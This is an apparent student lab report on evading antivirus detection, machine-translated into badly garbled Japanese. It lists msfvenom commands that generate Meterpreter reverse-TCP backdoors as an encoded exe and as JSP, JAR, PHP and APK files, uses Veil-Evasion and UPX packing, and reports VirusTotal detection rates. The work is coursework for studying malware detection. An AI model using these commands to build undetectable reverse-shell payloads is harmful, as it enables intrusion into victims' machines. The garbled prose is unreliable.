2019-2020-2 20175301「ネットワーク技術に対して」リー・クム蘭EXP3自由の原則と実践殺すために#を
ディレクトリ
1.ターゲットの練習
(1L)タスク:適切MSFエンコーダ、msfvenomは、瓶など、ベール、脱税などの他のファイルを生成し、それらの使用は無料シェルコードのプログラミングのスキルやツールを殺すために
悪質な技術の様々な組み合わせのアプリケーションを介して:(2)2つのタスクが殺害回避するためのコード
上のソフトを殺すの場合には、別のコンピュータを使用して測定し、さらに成功するために戻って実行して、コンピュータの名前の付いたソフトのバージョンを殺す:(3)タスク3を
2.基本
殺すために自由の原則2.1
無料アンチアンチウイルスは、「自由キル」と呼ばれるウイルス対策技術と呼ばれる技術を殺すために、それは、ウイルス対策ソフトウェア技術を殺すからトロイの木馬ウイルスのための道を指します。技術は技術やその他のシステムの脆弱性をハッキング、解体含み、非常に広い範囲、リバースエンジニアリングをカバー殺す避けるために起因する、それは非常に困難です。その内容は、基本的に殺してアンチウイルスソフトウェアを避けるため、内容を変更するには、ウイルス、トロイの木馬の署名を変更しています。
あなたが避けるの殺害に良い仕事をしたい場合は、それは明らかにアンチウイルスソフトウェア(マルウェア検出ツール)は、それがどのように動作するかである必要があります。AV(アンチウイルス)が大きな産業です。
3.実験手順
3.11。適切な使用のMSFエンコーダ
唯一の結果いったんコンパイルされ、最後の実験生成されたファイルを初めて目
VirusTotalのウェブサイトからの結果を殺し
コード入力する
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b '\x00' LHOST=192.168.198.128 LPORT=5301 -f exe > encoded10.exe
プログラムの後ろに10回を生成コンパイラを
実証し、いくつかの異なるマルチコンパイラは、より多くの、まだ柔らかい殺害を殺害されていません。 、特に私の火口は数回を殺します。
JSPファイル生成3.2.msfvenom
使用msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.198.128 LPORT=5301 x> 20175301jsp.jsp
するJSPファイルの生成
は検出されない火口を
3.3msfvenom生成されたjarファイル
使用msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.198.128 LPORT=5301 x> 20175301jar.jar
生成されたjarファイルの
火口が検出されていません
3.4msfvenom PHPファイルを生成します
使用msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.198.128 LPORT=5301 x> 20175301php.php
のphpファイルを生成
まだ無応答火口を
3.5msfvenom生成されたAPK(アンドリュース)ファイル
使用して、msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.198.128 LPORT=5301 x> 20175301apk.apk
APKファイルの生成
火口のように見えますが、実際に役に立ちません
3.6利用ベール - 脱税生成バックドア
プロセスのベールは本当に紆余曲折ありダウンロード、私は別のブログの多くは、最後の勝利は、書類の不足で見つかっ参照
して使用することはできませんsudo apt-get install win
インストールする
方法の最終使用https://www.cnblogs.com/20175317zrw/p/12504140.html
事実を彼はまだこの文字を遊んでいたとき、インストールは非常に遅い非常に遅いです
し、最終的により良い役に立たないより少しの影響隠されたベールを証明しました
パッカーを使用して3.7 UPX
私は自信を持って何もなかった彼を殺し火口を参照してください。
殺害を避けるために、悪意のあるコードを達成するために様々な技術のアプリケーションを組み合わせることにより3.8
既知の方法は、他の負荷のベールの使用がありますされ、VirusTotal 0クエリレートに達することができる
ブログhttps://www.cnblogs.com/20175317zrw/p/12504140.htmlから方法
3.9のソフトを殺すの場合には、別のコンピュータで測定し、コンピュータの名前の付いたソフトのバージョンを殺す、でも成功するために戻って実行します
ただ、パッカー缶
4.問題の実験
主な問題は、インストールのベールで深刻で、私は誰か他の人のブログを参照するために、かなりの後ろと同様に行っている、実験における基本的な問題は解決されそう。私は道の技術革新のうち、前のステップは、後ろの人のための便利な方法を取ることができると信じています。
5.質問答え
どのように1)キルソフトには、悪意のあるコードを検出していますか?
署名、ウイルスデータベース検索によると、1つのVIP検出(行動特性を観察する)
2)どのような殺害を避けるために行うには
抗キル柔らかい
ものを殺す避けるために、3)基本的な方法を?
変更署名は、行動特性に変更し、(ウイルスはカレーません)他の人のウイルスを参照しない
)4を開いソフトキルを絶対的に悪質なコンピュータコードを防ぐことができますか?
いいえ、私はちょうどそれをしませんでした。